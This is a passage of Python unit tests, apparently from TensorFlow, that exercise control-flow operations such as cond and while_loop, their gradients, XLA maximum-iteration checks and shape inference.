control_flow_ops.cond(
constant_op.constant(True), lambda: x + 2, lambda: x + 0)
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if graph.is_fetchable(t.op):
sess.run(t, feed_dict={x: 3})
else:
with self.assertRaisesRegexp(ValueError,
"has been marked as not fetchable"):
sess.run(t, feed_dict={x: 3})
@test_util.disable_control_flow_v2("Not relevant")
def testFeedable(self):
with self.cached_session() as sess:
c = constant_op.constant(2)
i0 = constant_op.constant(0)
r = control_flow_ops.while_loop(lambda i: i < 1000,
lambda i: math_ops.square(c) + i, [i0])
self.assertEqual(1000, r.eval(feed_dict={i0: 0}))
feedable_tensors = all_feedables()
for t in feedable_tensors:
sess.run(r, feed_dict={t: 3})
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if t not in feedable_tensors and t.dtype is dtypes.int32:
with self.assertRaisesRegexp(ValueError, "may not be fed"):
sess.run(r, feed_dict={t: 3})
@test_util.disable_control_flow_v2("b/113296180 (IndexedSlices)")
def testCondIndexedSlices(self):
with self.cached_session():
values = constant_op.constant(10)
indices = constant_op.constant(0)
x = ops.IndexedSlices(values, indices)
pred = math_ops.less(1, 2)
fn1 = lambda: ops.IndexedSlices(math_ops.add(x.values, 1), indices)
fn2 = lambda: ops.IndexedSlices(math_ops.subtract(x.values, 1), indices)
r = control_flow_ops.cond(pred, fn1, fn2)
val = r.values.eval()
ind = r.indices.eval()
self.assertAllEqual(11, val)
self.assertAllEqual(0, ind)
@test_util.disable_control_flow_v2("b/113296161 (SparseTensors)")
def testCondSparseTensor(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
pred = math_ops.less(1, 2)
fn1 = lambda: sparse_tensor.SparseTensor(
indices + 1, x.values + 1, dense_shape=shape)
fn2 = lambda: sparse_tensor.SparseTensor(
indices, x.values - 1, dense_shape=shape)
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual([3.0, 5.0], r.values.eval())
self.assertAllEqual([[1], [4]], r.indices.eval())
self.assertAllEqual(r.values.get_shape(), (2,))
def testCondResource(self):
with self.cached_session():
rv = resource_variable_ops.ResourceVariable(True)
variables.global_variables_initializer().run()
t = ops.convert_to_tensor(1.0)
def case():
assign = resource_variable_ops.assign_variable_op(rv.handle, False)
with ops.control_dependencies([assign]):
return array_ops.identity(t)
self.assertEqual(1.0, control_flow_ops.cond(rv, case, lambda: t).eval())
@test_util.disable_control_flow_v2("b/113293074")
def testCondIndexedSlicesDifferentTypes(self):
with self.cached_session():
values = constant_op.constant(10)
i_32 = ops.convert_to_tensor(0, name="one", dtype=dtypes.int32)
i_64 = ops.convert_to_tensor(0, name="one", dtype=dtypes.int64)
x = ops.IndexedSlices(values, i_32)
pred = math_ops.less(1, 2)
fn1 = lambda: ops.IndexedSlices(math_ops.add(x.values, 1), i_32)
fn2 = lambda: ops.IndexedSlices(math_ops.subtract(x.values, 1), i_64)
r = control_flow_ops.cond(pred, fn1, fn2)
val = r.values.eval()
ind = r.indices.eval()
self.assertAllEqual(11, val)
self.assertAllEqual(0, ind)
self.assertTrue(ind.dtype == np.int64)
def testCondColocation(self):
with self.test_session(use_gpu=True):
with ops.device("/cpu:0"):
v = variables.Variable(7.0)
x = constant_op.constant(10.0)
pred = math_ops.less(1.0, 2.0)
fn1 = lambda: math_ops.add(v, 1.0)
fn2 = lambda: math_ops.subtract(x, 1.0)
r = control_flow_ops.cond(pred, fn1, fn2)
for op in x.graph.get_operations():
if op.name == "cond/Add/Switch":
self.assertDeviceEqual(op.device, "/cpu:0")
def _testCond_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
x = constant_op.constant(10)
pred = math_ops.less(1, 2)
fn1 = lambda: math_ops.add(x, 1)
fn2 = lambda: math_ops.subtract(x, 1)
r = control_flow_ops.cond(pred, fn1, fn2)
result = r.eval()
self.assertAllEqual(11, result)
def testCond_1(self):
self._testCond_1(use_gpu=False)
# TODO(b/116526896): Enable GPU tests.
# self._testCond_1(use_gpu=True)
def testCond_2(self):
with self.cached_session():
x = constant_op.constant(10)
r = control_flow_ops.cond(
math_ops.less(1, 0), lambda: math_ops.add(x, 1),
lambda: math_ops.subtract(x, 1))
result = r.eval()
self.assertAllEqual(9, result)
def testCond_3(self):
with self.cached_session():
x = constant_op.constant(10)
pred = math_ops.less(1, 2)
fn1 = lambda: math_ops.add(x, 1)
fn2 = lambda: math_ops.subtract(x, 1)
fn3 = lambda: math_ops.add(control_flow_ops.cond(pred, fn1, fn2), 1)
r = control_flow_ops.cond(pred, fn3, fn2)
result = r.eval()
self.assertAllEqual(12, result)
@test_util.disable_control_flow_v2("b/113324949 (ref vars)")
def testCond_4(self):
with self.cached_session():
v1 = variables.Variable(7)
v2 = variables.Variable(7)
v3 = variables.Variable(7)
age = constant_op.constant(3)
max_age = constant_op.constant(2)
pred = math_ops.greater(age, max_age)
fn1 = lambda: [state_ops.assign(v1, 1).op, state_ops.assign(v2, 2).op]
fn2 = lambda: [state_ops.assign(v3, 3).op, constant_op.constant(10).op]
r = control_flow_ops.cond(pred, fn1, fn2)
variables.global_variables_initializer().run()
self.assertEqual(len(r), 2)
result = r[1].eval()
self.assertAllEqual(True, result)
self.assertAllEqual(7, v1.eval())
self.assertAllEqual(2, v2.eval())
self.assertAllEqual(7, v3.eval())
def testCond_5(self):
with self.cached_session():
alive = constant_op.constant(True, name="alive")
count = constant_op.constant(0, name="count")
def body(i):
return control_flow_ops.cond(
alive, lambda: [math_ops.less(i, 3), math_ops.add(count, 1)],
lambda: [alive, count])
for i in range(10):
alive, count = body(i)
self.assertAllEqual(4, count.eval())
def testCond_6(self):
with self.cached_session():
v1 = variables.Variable([7])
age = constant_op.constant(3)
pred = math_ops.greater(age, 4)
fn1 = lambda: age
fn2 = lambda: v1
r = control_flow_ops.cond(pred, fn1, fn2)
variables.global_variables_initializer().run()
result = r.eval()
self.assertAllEqual(np.array([7]), result)
def testCond_7(self):
with self.cached_session() as sess:
x = constant_op.constant(10)
y = constant_op.constant(200)
pred = math_ops.less(1, 2)
fn1 = lambda: [math_ops.add(x, 1), math_ops.add(x, 2)]
fn2 = lambda: [y, y]
r = control_flow_ops.cond(pred, fn1, fn2)
self.assertAllEqual([11, 12], sess.run(r))
def testCondRef(self):
with self.cached_session():
x = gen_state_ops.variable(
shape=[1],
dtype=dtypes.float32,
name="x",
container="",
shared_name="")
true_fn = lambda: x
false_fn = lambda: constant_op.constant([2.0])
r = control_flow_ops.cond(constant_op.constant(False), true_fn, false_fn)
self.assertAllEqual([2.0], r.eval())
@test_util.disable_control_flow_v2("b/79881896 (control deps)")
def testCondWithControl(self):
with self.cached_session():
control_holder = array_ops.placeholder(dtypes.float32, shape=())
a = constant_op.constant(3)
def true_branch():
with ops.control_dependencies([control_holder]):
_ = a + 1
return a + 2
r = control_flow_ops.cond(
constant_op.constant(True), true_branch,
lambda: constant_op.constant(1))
self.assertEqual(5, r.eval())
def testUninitializedRefIdentity(self):
with self.cached_session() as sess:
v = gen_state_ops.variable(
shape=[1],
dtype=dtypes.float32,
name="v",
container="",
shared_name="")
inited = state_ops.is_variable_initialized(v)
v_f, v_t = control_flow_ops.ref_switch(v, inited)
# Both v_f and v_t are uninitialized references. However, an actual use
# of the reference in the 'true' branch in the 'tf.identity' op will
# not 'fire' when v is uninitialized, so this is a valid construction.
# This test tests that ref_identity allows uninitialized ref as input
# so that this construction is allowed.
v_f_op = gen_array_ops.ref_identity(v_f)
v_t_op = gen_array_ops.ref_identity(v_t)
with ops.control_dependencies([v_f_op]):
assign_v = state_ops.assign(v, [1.0])
with ops.control_dependencies([v_t_op]):
orig_v = array_ops.identity(v)
merged_op = control_flow_ops.merge([assign_v, orig_v])
self.assertAllEqual([1.0], sess.run(merged_op.output))
@test_util.disable_control_flow_v2(
"b/112477618 (Operation returned from cond)")
def testCondSwitchIdentity(self):
# Make sure the recv identity is not removed by optimization.
with session.Session(config=opt_cfg()) as sess:
pred = constant_op.constant(True)
def fn1():
return control_flow_ops.no_op()
def fn2():
return control_flow_ops.Assert(False, ["Wrong branch!!!"])
r = control_flow_ops.cond(pred, fn1, fn2)
sess.run(r)
@test_util.disable_control_flow_v2(
"b/112477618 (Operation returned from cond)")
def testCondRecvIdentity(self):
# Make sure the switch identity is not removed by optimization.
with session.Session(config=opt_cfg()) as sess:
with ops.device(test.gpu_device_name()):
pred = constant_op.constant(True)
def fn1():
return control_flow_ops.no_op()
def fn2():
with ops.device("/cpu:0"):
return control_flow_ops.Assert(False, ["Wrong branch!!!"])
r = control_flow_ops.cond(pred, fn1, fn2)
sess.run(r)
@test_util.disable_control_flow_v2("b/113346829 (gpu failure)")
def testCondGrad_1(self):
graph = ops.Graph()
with graph.as_default():
x = constant_op.constant(10.0, name="x")
pred = math_ops.less(1, 2)
fn1 = lambda: array_ops.identity(x)
fn2 = lambda: array_ops.identity(x)
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [x])[0]
with self.cached_session():
self.assertAllEqual(1.0, grad.eval())
def testCondGrad_2(self):
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
x = constant_op.constant(10.0)
pred = math_ops.less(c, 2)
fn1 = lambda: math_ops.multiply(x, 42.0)
fn2 = lambda: math_ops.multiply(x, 3.0)
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [x])[0]
self.assertAllEqual(42.0, grad.eval(feed_dict={c: 1}))
self.assertAllEqual(3.0, grad.eval(feed_dict={c: 3}))
@test_util.disable_control_flow_v2(
"b/110550782 (gradient w.r.t external variable)")
def testCondGrad_3(self):
with self.cached_session():
c = array_ops.placeholder(dtypes.int32, shape=[])
ox = constant_op.constant(10.0)
pred = math_ops.less(c, 2)
def fn1(x):
m = x * x
return gradients_impl.gradients(m, [ox])[0]
fn2 = lambda: math_ops.multiply(ox, 3.0)
y = math_ops.multiply(7.0, ox)
r = control_flow_ops.cond(pred, lambda: fn1(y), fn2)
self.assertAllEqual(980.0, r.eval(feed_dict={c: 1}))
self.assertAllEqual(30.0, r.eval(feed_dict={c: 3}))
def testNestedCond_Simple(self):
with self.cached_session():
x = constant_op.constant(0., name="X")
y = control_flow_ops.cond(
constant_op.constant(True), lambda: x,
lambda: control_flow_ops.cond(x < 1., lambda: x, lambda: x))
result = gradients_impl.gradients(y, x)[0]
self.assertEqual(1.0, result.eval())
z = control_flow_ops.cond(
constant_op.constant(False), lambda: x,
lambda: control_flow_ops.cond(x < 1., lambda: x, lambda: x))
result = gradients_impl.gradients(z, x)[0]
self.assertEqual(1.0, result.eval())
@test_util.disable_control_flow_v2("b/113327884")
def testCondGrad_Gather(self):
with self.cached_session() as sess:
v1 = variables.Variable([1.0, 42.0])
c = array_ops.placeholder(dtypes.int32, shape=[])
pred = math_ops.less(c, 2)
fn1 = lambda: array_ops.identity(v1)
fn2 = lambda: array_ops.gather(v1, [1, 1])
r = control_flow_ops.cond(pred, fn1, fn2)
grad = gradients_impl.gradients(r, [v1])[0]
variables.global_variables_initializer().run()
# Should just be [1, 1], but possibly a sparse representation
gv, gi = sess.run([grad.values, grad.indices], feed_dict={c: 1})
dense_gv = [
sum([y for (x, y) in zip(gi, gv) if x == i]) for i in range(2)
]
self.assertAllEqual(dense_gv, [1.0, 1.0])
# Should be [0, 2], as the else forwards v1[1] twice
gv, gi = sess.run([grad.values, grad.indices], feed_dict={c: 3})
dense_gv = [
sum([y for (x, y) in zip(gi, gv) if x == i]) for i in range(2)
]
self.assertAllEqual(dense_gv, [0.0, 2.0])
# Microbenchmark: 256,000 iterations/s.
@test_util.disable_control_flow_v2("b/116630618 (Times out)")
def testWhile_1(self):
with self.cached_session():
n = constant_op.constant(0)
c = lambda x: math_ops.less(x, 10000)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual(10000, r.eval())
@test_util.disable_control_flow_v2("b/79881896 (control deps)")
def testWhileExternalControlDependencies(self):
with self.cached_session():
v = variables.Variable(0.0)
v.initializer.run()
increment = v.assign_add(1.0)
def body_fn(i):
with ops.control_dependencies([increment]):
return i + 1
result = control_flow_ops.while_loop(cond=lambda i: i < 2,
body=body_fn, loop_vars=[1])
self.assertAllEqual(result.eval(), 2)
self.assertAllEqual(v.eval(), 1.0)
@test_util.disable_control_flow_v2("b/79881896 (control deps)")
def testWhileExternalControlDependenciesNoInput(self):
with self.cached_session():
v = variables.Variable(0.0)
v.initializer.run()
increment = v.assign_add(1.0)
def body_fn(unused_i):
with ops.control_dependencies([increment]):
return constant_op.constant(5, name="five")
result = control_flow_ops.while_loop(cond=lambda i: i < 5,
body=body_fn, loop_vars=[0])
result.eval()
self.assertAllEqual(v.eval(), 1.0)
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileWithRefs_1(self):
with self.cached_session() as sess:
x = variables.VariableV1(0)._ref() # pylint: disable=protected-access
i = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 100)
self.assertEqual(x.dtype, dtypes.int32_ref)
def b(i, x):
self.assertEqual(x.dtype, dtypes.int32_ref)
return (i + 1, gen_array_ops.ref_identity(x))
r = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=5)
variables.global_variables_initializer().run()
self.assertEqual(r[0].dtype, dtypes.int32)
self.assertEqual(r[1].dtype, dtypes.int32_ref)
value_i, value_x = sess.run(r)
self.assertEqual(100, value_i)
self.assertEqual(0, value_x)
def testWhile_2(self):
with self.cached_session():
s = constant_op.constant(0)
r = isum(s)
self.assertAllEqual(45, r.eval())
@test_util.disable_control_flow_v2("b/115776323 (max_iters)")
def testWhileWithMaximumIterations(self):
with self.cached_session():
s = constant_op.constant([1, 2, 3, 4, 5])
r = isum(s, maximum_iterations=3)
self.assertAllEqual([1 + 3, 2 + 3, 3 + 3, 4 + 3, 5 + 3], r.eval())
@test_util.disable_control_flow_v2("b/116339888 (non-tensor loop var)")
def testWhileWithMaximumIterationsAndSingleArgument(self):
with self.cached_session():
r = control_flow_ops.while_loop(
lambda i: i < 3, lambda i: i + 1, [0], maximum_iterations=1)
self.assertEqual(1, r.eval())
@test_util.disable_control_flow_v2(
"b/116248044 (nested), b/115920078 (gradients)")
def testSingleNestedMaximumIterationsWhileLoopGradientInXLAContext(self):
v = constant_op.constant(1.0)
def training_loop_with_gradient(i):
out = control_flow_ops.while_loop(
lambda i_, _: i_ < 3,
lambda i_, j: [i_ + 1, j * v], [0, 1.0],
maximum_iterations=i)
g = gradients_impl.gradients(out, v)
with ops.control_dependencies(g):
return i + 1
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
# Create training loop, ensure we can call gradient() of
# while_loop inside the training loop.
loop = control_flow_ops.while_loop(lambda i: i < 3,
training_loop_with_gradient, [0])
xla_context.Exit()
loop_execute = array_ops.identity(loop) # Because loop is not fetchable.
# Should execute without issue.
self.assertEqual(3, self.evaluate(loop_execute))
@test_util.disable_control_flow_v2("b/116248044 (nested while_loop)")
def testInvalidMaximumIterationsWhileLoopGradientInXLAContext(self):
v = constant_op.constant(1.0)
def inner_body(i, x):
out = control_flow_ops.while_loop(
lambda i, _: i < 3,
lambda i, j: [i + 1, j * v], [0, x],
maximum_iterations=i)
return out
def create_while_loop(maximum_iterations=None):
return control_flow_ops.while_loop(
lambda i, _: i < 3,
inner_body, [0, 1.0],
maximum_iterations=maximum_iterations)
loop_no_xla = create_while_loop(maximum_iterations=5)
# maximum_iterations is fine outside of an XLA scope
gs = gradients_impl.gradients(loop_no_xla, v)
self.evaluate(gs) # This should execute without error.
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
loop_no_maxiter = create_while_loop()
loop_with_maxiter = create_while_loop(maximum_iterations=2)
xla_context.Exit()
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside "
r"XLA while_loop because maximum_iterations was not passed to "
r"the tf.while_loop call \('.+'\)."):
_ = gradients_impl.gradients(loop_no_maxiter, v)
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside XLA "
r"while_loop. maximum_iterations tensor '.+' for while_loop context "
r"'.+' must be statically known \(e.g. a constant value or known "
r"shape dimension\), or be defined at or outside the while loop "
r"context '.*' \(currently defined in '.*'\)"):
_ = gradients_impl.gradients(loop_with_maxiter, v)
@test_util.disable_control_flow_v2("b/115776323 (max_iters)")
def testInvalidMaximumIterationsFromSiblingContextWhileLoopInXLAContext(self):
v = constant_op.constant(1.0)
def create_while_loop():
max_iter_holder = []
def create_mi():
max_iter_holder.append(array_ops.placeholder(dtypes.int32, shape=()))
return 1.0
_ = control_flow_ops.cond(
constant_op.constant(True), create_mi, create_mi)
return control_flow_ops.while_loop(
lambda i, _: i < 3,
lambda i, x: (i + 1, v * x), (0, 1.0),
maximum_iterations=max_iter_holder[0])
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
loop = create_while_loop()
xla_context.Exit()
with self.assertRaisesRegexp(
ValueError,
r"Cannot create a gradient accumulator for tensor '.+' inside XLA "
r"while_loop. maximum_iterations tensor '.*Placeholder:0' for "
r"while_loop context '.+' must be statically known \(e.g. a constant "
r"value or known shape dimension\), or be defined at or outside the "
r"while loop context '' \(currently defined in 'cond/.+'\)"):
_ = gradients_impl.gradients(loop, v)
@test_util.disable_control_flow_v2(
"b/116248044 (nesting), b/115776323 (max_iters)")
def testNestedWhileLoopWithMaxItersFromOuterContextInXLAContext(self):
v = constant_op.constant(1.0)
p = array_ops.placeholder(dtype=dtypes.int32)
def mid_body_builder(iterations):
def mid_body(i, x):
r = control_flow_ops.while_loop(
lambda *_: True,
lambda i, x: (i + 1, v * x), (0, x),
maximum_iterations=iterations,
name="inner")
return (i + 1, gradients_impl.gradients(x + r[1], v)[0])
return mid_body
def outer_body(i, x):
iterations = array_ops.size(p, name="iterations")
return (i + 1, x + control_flow_ops.while_loop(
lambda *_: True,
mid_body_builder(iterations), (0, x),
maximum_iterations=iterations,
name="mid")[1])
def create_while_loop():
with ops.device("/cpu:0"):
r = control_flow_ops.while_loop(
lambda *_: True,
outer_body, (0, 1.0),
maximum_iterations=5,
name="outer")
return array_ops.identity(r[1])
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
final_with_xla_context = create_while_loop()
xla_context.Exit()
final_without_xla_context = create_while_loop()
with self.test_session(use_gpu=False) as sess:
opts = config_pb2.RunOptions(trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
final_value_without_xla_context = sess.run(
final_without_xla_context, feed_dict={
p: [0, 0, 0]
})
final_value_with_xla_context = sess.run(
final_with_xla_context,
feed_dict={p: [0, 0, 0]},
options=opts,
run_metadata=run_metadata)
node_stats = run_metadata.step_stats.dev_stats[0].node_stats
stack_push_count = len(
[x for x in node_stats if x.node_name.endswith("StackPushV2")])
# Pushes to the stack = product of maximum_iterations values;
# the last two "3"s comes from size(p), when p == [0, 0, 0].
self.assertEqual(stack_push_count, 5 * 3 * 3)
self.assertAllClose(final_value_with_xla_context,
final_value_without_xla_context)
# Have more than 10 parallel iterations and hence exercise k-bound
# most of the time.
def testWhile_3(self):
with self.cached_session():
def compute(i, m, c, o):
m, c = [math_ops.add(m, 1), math_ops.add(c, 1)]
o = math_ops.add(o, m)
o = math_ops.add(o, c)
i = math_ops.add(i, 1)
return [i, m, c, o]
i = ops.convert_to_tensor(0)
m = ops.convert_to_tensor(0)
c = ops.convert_to_tensor(0)
o = ops.convert_to_tensor(0)
d = ops.convert_to_tensor(100)
r = control_flow_ops.while_loop(lambda i, m, c, o: math_ops.less(i, d),
compute, [i, m, c, o])
result = r[3].eval()
self.assertAllEqual(10100, result)
def testWhile_4(self):
with self.cached_session():
def compute(i, m, c, o):
m, c = [array_ops.gather(x, i), array_ops.gather(x, i)]
o = math_ops.add(o, m)
o = math_ops.add(o, c)
i = math_ops.add(i, 1)
return [i, m, c, o]
i = ops.convert_to_tensor(0)
m = ops.convert_to_tensor(0)
c = ops.convert_to_tensor(0)
o = ops.convert_to_tensor(0)
x = ops.convert_to_tensor([1, 2, 3, 4, 5, 6])
s = array_ops.size(x)
r = control_flow_ops.while_loop(lambda i, m, c, o: math_ops.less(i, s),
compute, [i, m, c, o])
result = r[3].eval()
self.assertAllEqual(42, result)
@test_util.disable_control_flow_v2("b/116283162 (shape_invariants)")
def testWhile_5(self):
with self.cached_session():
def compute(i, c, o):
c = array_ops.strided_slice(x, array_ops.expand_dims(i, 0),
[1] + array_ops.expand_dims(i, 0))
o = array_ops.concat([o, c], 0)
i = math_ops.add(i, 1)
return [i, c, o]
i = ops.convert_to_tensor(0)
c = ops.convert_to_tensor([0])
o = ops.convert_to_tensor([0])
x = ops.convert_to_tensor([1, 2, 3, 4, 5, 6])
s = array_ops.size(x)
r = control_flow_ops.while_loop(lambda i, c, o: math_ops.less(i, s),
compute, [i, c, o], [
i.get_shape(),
tensor_shape.unknown_shape(),
tensor_shape.unknown_shape()
])
result = r[2].eval()
self.assertAllEqual(np.array([0, 1, 2, 3, 4, 5, 6]), result)
@test_util.disable_control_flow_v2("b/116338794 (buffer_reuse)")
def testBufferForwarding(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with self.cached_session() as sess:
with ops.device("/cpu:0"):
c = constant_op.constant(2)
i0 = constant_op.constant(0)
r = control_flow_ops.while_loop(lambda i: i < 1000,
lambda i: math_ops.square(c) + i, [i0])
r_val = sess.run(r, options=run_options, run_metadata=run_metadata)
self.assertEqual(1000, r_val)
self.assertTrue(run_metadata.HasField("step_stats"))
unique_allocs = set()
for node_stat in run_metadata.step_stats.dev_stats[0].node_stats:
for output in node_stat.output:
unique_allocs.add(
output.tensor_description.allocation_description.ptr)
# Prior to cl/147536680, the number of unique allocations was about 1005.
self.assertLess(len(unique_allocs), 756)
def _testWhile_Gpu_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = constant_op.constant(1.0)
c = lambda x: math_ops.less(x, 10.0)
b = lambda x: math_ops.add(x, 1.0)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllClose(10.0, r.eval())
def testWhile_Gpu_1(self):
self._testWhile_Gpu_1(use_gpu=False)
self._testWhile_Gpu_1(use_gpu=True)
def _testWhile_Gpu_2(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = constant_op.constant(1.0)
c = lambda x: math_ops.less(x, 10.0)
def b(x):
with ops.device("/cpu:0"):
return math_ops.add(x, 1.0)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllClose(10.0, r.eval())
def testWhile_Gpu_2(self):
    self._testWhile_Gpu_2(use_gpu=False)
    self._testWhile_Gpu_2(use_gpu=True)
@test_util.disable_control_flow_v2("b/116283162 (shape_invariants)")
def testWhileShape(self):
with self.cached_session():
i = constant_op.constant(0)
m = array_ops.ones([2, 2])
c = lambda i, j: math_ops.less(i, 2)
def _b(i, j):
new_i = math_ops.add(i, 1)
new_j = array_ops.tile(j, [2, 2])
return [new_i, new_j]
r = control_flow_ops.while_loop(
c, _b, [i, m],
[i.get_shape(), tensor_shape.unknown_shape()])
r = r[1] * array_ops.ones([8, 8])
self.assertAllEqual(np.ones((8, 8)), r.eval())
@test_util.disable_control_flow_v2("b/116339888 (non-tensor loop var)")
def testWhileWithNonTensorInput_Scalar(self):
with self.cached_session():
n = 0
c = lambda x: x < 10000
b = lambda x: x + 1
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual(10000, r.eval())
@test_util.disable_control_flow_v2("b/116339888 (non-tensor loop var)")
def testWhileWithNonTensorInput_Vector(self):
with self.cached_session():
n = np.array([0]) # Note, [0] would not work here; that is a list
c = lambda x: x[0] < 10000
b = lambda x: array_ops.stack([x[0] + 1])
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual([10000], r.eval())
@test_util.disable_control_flow_v2("b/116283162 (shape_invariants)")
def testWhileShapeInference(self):
with self.cached_session():
i = constant_op.constant(0)
m = array_ops.ones([2, 2])
c = lambda i, j: math_ops.less(i, 2)
def b(i, j):
new_i = math_ops.add(i, 1)
new_j = array_ops.concat([j, j], 0)
return [new_i, new_j]
r = control_flow_ops.while_loop(
c, b, [i, m],
[i.get_shape(), tensor_shape.TensorShape([None, 2])])
self.assertIsNone(r[1].get_shape()[0].value)
self.assertEqual(r[1].get_shape()[1], tensor_shape.Dimension(2))
with self.assertRaisesRegexp(
ValueError,
r"Input tensor 'ones:0' enters the loop with shape \(2, 2\), but has "
r"shape \(4, 2\) after one iteration. To allow the shape to vary "
r"across iterations, use the `shape_invariants` argument of "
r"tf.while_loop to specify a less-specific shape."):
r = control_flow_ops.while_loop(c, b, [i, m])
@test_util.disable_control_flow_v2("b/116328420 (SparseTensor)")
def testWhileShapeInferenceSparseTensor(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
i = constant_op.constant(0)
x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
sparse_tensor.SparseTensor(x.indices, x.values * 2.0, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
self.assertEqual(r.dense_shape.get_shape()[0].value, 1)
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None])])
self.assertTrue(r.dense_shape.get_shape()[0].value is None)
with self.assertRaisesRegexp(ValueError, "is not compatible with"):
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([5])])
@test_util.disable_control_flow_v2("b/116282023 (IndexedSlices)")
def testWhileShapeInferenceIndexedSlices(self):
with self.cached_session():
values = constant_op.constant([[2.0, 4.0], [3.0, 5.0]], name="values")
indices = constant_op.constant([0, 3], name="indices")
shape = constant_op.constant([10, 2], name="dense_shape")
i = constant_op.constant(0)
x = ops.IndexedSlices(values, indices, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
ops.IndexedSlices(x.values * 2.0, x.indices, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
self.assertEqual(r.dense_shape.get_shape()[0].value, 2)
self.assertEqual(r.values.get_shape(), tensor_shape.TensorShape([2, 2]))
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None, 2])])
self.assertEqual(r.dense_shape.get_shape()[0].value, 2)
self.assertTrue(r.values.get_shape()[0].value is None)
self.assertEqual(r.values.get_shape()[1].value, 2)
with self.assertRaisesRegexp(ValueError, "is not compatible with"):
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None, 5])])
def _testNestedWhile_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = constant_op.constant(0)
def cpu_sum(s):
c = lambda i, s: math_ops.less(i, 10)
def b(i, s):
i1 = math_ops.add(i, 1)
with ops.device("/cpu:0"):
s1 = math_ops.add(i, s)
return i1, s1
_, r_s = control_flow_ops.while_loop(c, b, [n, s])
return r_s
c = lambda x: math_ops.less(x, 200)
b = lambda x: math_ops.add(x, cpu_sum(n))
r = control_flow_ops.while_loop(c, b, [n])
self.assertEqual(225, r.eval())
@test_util.disable_control_flow_v2("b/116248044 (nested while)")
def testNestedWhile_1(self):
self._testNestedWhile_1(use_gpu=False)
self._testNestedWhile_1(use_gpu=True)
def _testNestedWhile_2(self, use_gpu):
# Test the cases that A -> Enter and Exit -> A are partitioned.
with self.test_session(use_gpu=use_gpu):
s0 = constant_op.constant(2.0)
def inner_loop(s):
c = lambda s: math_ops.less(s, 20.0)
def b(s):
s1 = math_ops.add(s, s)
return s1
r_s = control_flow_ops.while_loop(c, b, [s], parallel_iterations=1)
return r_s
outer_c = lambda x: math_ops.less(x, 3000.0)
def outer_b(x):
x = logging_ops.Print(x, [x]) # Edge "Print -> Enter" is partitioned
x = inner_loop(x)
with ops.device("/cpu:0"):
x = math_ops.square(x) # Edge "Exit -> Square" is partitioned
return x
r = control_flow_ops.while_loop(
outer_c, outer_b, [s0], parallel_iterations=1)
self.assertEqual(1048576.0, r.eval())
@test_util.disable_control_flow_v2("b/116248044 (nested while)")
def testNestedWhile_2(self):
self._testNestedWhile_2(use_gpu=False)
self._testNestedWhile_2(use_gpu=True)
def testWhileWithControl_1(self):
with self.cached_session():
n = constant_op.constant(0)
r = constant_op.constant(0)
condition = lambda n_, r_: math_ops.less(n_, 10)
def body(n_, r_):
n_ = math_ops.add(n_, 1)
with r_.graph.control_dependencies([r_]):
r_ = constant_op.constant(12)
return [n_, r_]
res = control_flow_ops.while_loop(
condition, body, [n, r], parallel_iterations=1)
self.assertAllEqual(12, res[1].eval())
def testWhileWithControl_2(self):
with self.cached_session():
r = constant_op.constant(0)
condition = lambda r_: math_ops.less(r_, 10)
def body(r_):
with r_.graph.control_dependencies([r_]):
r_ = constant_op.constant(12)
return [r_]
res = control_flow_ops.while_loop(
condition, body, [r], parallel_iterations=1)
self.assertAllEqual(12, res.eval())
def testWhileWithControl_3(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
with ops.control_dependencies([b]):
r = control_flow_ops.while_loop(lambda x: x < 10, lambda x: x + c, [x0])
